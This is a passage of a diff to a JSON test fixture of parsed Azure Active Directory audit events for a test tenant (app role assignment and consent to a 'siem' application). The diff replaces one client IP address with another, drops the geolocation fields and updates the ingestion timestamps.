- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -6558,7 +5964,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -6694,7 +6100,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -6706,12 +6112,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036282900Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125018800Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"N
ame\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryse
rvice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -6737,25 +6143,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -6769,7 +6157,7 @@ "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -6908,7 +6296,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -6920,12 +6308,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036298400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\
",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:06.0142481Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795893\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"821dc03c-4e38-4cd1-82b2-3155b41b4418\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[[Id:
 MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125024300Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mo
zilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:06.0142481Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795893\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"821dc03c-4e38-4cd1-82b2-3155b41b4418\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, 
ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -6951,25 +6339,7 @@ }, { "source": { - "geo": { - "continent_name": 